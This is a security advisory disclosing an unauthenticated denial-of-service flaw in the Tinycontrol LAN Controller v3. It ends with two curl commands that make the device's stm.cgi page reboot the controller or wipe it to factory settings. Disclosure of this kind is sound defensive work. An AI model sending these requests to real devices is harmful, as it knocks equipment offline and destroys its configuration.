Tinycontrol LAN Controller 3 Denial Of Service

Tinycontrol LAN Controller v3 (LK3) Remote Denial Of Service ExploitVendor: TinycontrolProduct web page: https://www.tinycontrol.plAffected version: <=1.58a, HW 3.8Summary: Lan Controller is a very universaldevice that allows you to connect many differentsensors and remotely view their readings andremotely control various types of outputs.It is also possible to combine both functionsinto an automatic if -> this with a calendarwhen -> then. The device provides a user interfacein the form of a web page. The website presentsreadings of various types of sensors: temperature,humidity, pressure, voltage, current. It alsoallows you to configure the device, incl. eventsetting and controlling up to 10 outputs. Thanksto the support of many protocols, it is possibleto operate from smartphones, collect and observthe results on the server, as well as cooperationwith other I/O systems based on TCP/IP and Modbus.Desc: The controller suffers from an unauthenticatedremote denial of service vulnerability. An attackercan issue direct requests to the stm.cgi page toreboot and also reset factory settings on the device.Tested on: lwIPVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5785Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php18.08.2023--$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1   # reboot controller